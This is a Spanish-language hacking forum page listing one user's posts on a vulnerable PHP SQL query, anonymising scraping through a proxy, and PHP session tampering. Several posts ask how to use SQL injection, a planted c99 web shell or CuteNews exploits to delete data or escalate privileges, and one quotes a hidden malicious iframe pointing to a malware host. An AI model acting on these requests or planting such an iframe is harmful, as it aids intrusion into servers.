elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


  Mostrar Temas
Páginas: [1]
1  Seguridad Informática / Nivel Web / SQL injection, obtener mas informacion o borrara datos en: 7 Marzo 2011, 09:29 am
Bueno amigos tengo la siguiente duda.

tengo esta sentencia sql

Código:
$thefaq=mysql_query("SELECT question,answer,lasteditedby,lastedit FROM faq WHERE id='$faqid'");

$faq=mysql_fetch_array($thefaq);

y para desplegar la salida html realiza la verificacion

Código:
if($faq[question]){

..... sale el HTML

}

como podria borrar datos o bien como podria ingresar una shell.

sabiendo que no el codigo entra limpio sin filtro de magic quotes etc.
2  Programación / PHP / Scraping cn PHP cURL y Proxy en: 12 Marzo 2010, 02:26 am
Bueno amigos lo que necesito es ver el codigo fuente de la web, pero que este nunca detecte mi real ip, es por eso que requiero de cURL ... tengo un codigo pero no me funciona como espero.

Código
  1. <?php
  2. $ch = curl_init('http://www.miip.cl/');
  3. curl_setopt($ch, curlOPT_HTTPproxyTUNNEL, 1);
  4. curl_setopt($ch, curlOPT_proxy, '200.113.165.54:8080');
  5. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  6. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  7. $page = curl_exec($ch);
  8.  
  9. print $page;
  10. ?>


no me cambia la ip ....

alguien tiene un script similar ?


Gracias.
3  Programación / PHP / Pregunta con $_SESSION php en: 14 Agosto 2009, 11:34 am
Bueno amigos lo que pasa es que estoy programando un panel de control y estoy tomando todos los cuidados posibles es por ello que quiero hacer la siguiente pregunta.

¿Es posible modificar el valor de las $_SESSION?

porque lo pregunto porque si yo en panel guardo el nivel del usuario

1 = admin
2 = moderador
3 = cliente

$_SESSION['nivel'] = 1;

..... alguien podria modificar su nivel y paff me caga XD



4  Seguridad Informática / Nivel Web / dudas con http://x8n.ru:8080/index.php en: 1 Agosto 2009, 07:11 am
Bueno realmente he buscado informacion sobre esto en google

http://x8n.ru:8080/index.php

y sale simplemente que es un malware...

-------

Les cuento tengo un sitio web y google lo ha bloqueado porque me dice que es unsitio atacante, cosa que no lo es. Pero revisando mis archivos index.php y varios de mis otros index tenian dentro un <iframe src="http://x8n.ru:8080/index.php></iframe> en hidden y bueno obviamente lo borre y todo, pero mi preguntas son.

¿como llego hay?
¿porque afecta mis archivo index?
¿como puedo solucionar esto?


Gracias.
5  Seguridad Informática / Nivel Web / Ayuda con c99.php insertada en: 17 Julio 2009, 06:35 am
Bueno lo que pasa es que tengo una shell injectada pero lo malo es que no he podido hacer mucho ya que el panel de control que usa el servidor es Ferozo y cual deja bastante limitado todo, a tal punto que cualquier comando que quiera ejecutar me lanza como resultado 126, no puedo ejecutar comandos en el servidor....

¿Encontonces como podre escalar privilegios?

¿Que me recomiendan?


Gracias.
6  Seguridad Informática / Nivel Web / CuteNews Escalar privilegios en: 23 Mayo 2009, 06:24 am
Hola buenas ya he podido entrar al admin del cutenews usando dos exploit, uno que me buscar el nick del admin y otro me mostrara el hash en md5 y bueno pude entrar pero ahora quiero tratar de ir por mas pero no se me ocurre como poder escalar mas privilegios, quiero de alguna manera injectar una shell c99 o algo para poder tener un poco mas de control sobre el servidor, y hay esta la pregunta...


¿Se puede escalar mas privilegios por medio de Cutenew o bien injectar una shell?
7  Seguridad Informática / Nivel Web / Escalar privilegios con c99.txt en: 15 Mayo 2009, 23:45 pm
Bueno lo que pasa es que tengo un host con cpanel, todo es bastante seguro pero ahora estoy viendo el tema de los rfi defeat y todo el tema y bueno puse una c99.txt en mi servidor y puedo ver casi todo menos algunos directorios en donde solo tiene permisos el administrador, mi consulta es... ¿Es posible escalar privilegios por medio de la shell 99.txt?, o es posible cambiar los permisos de los directorios.
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines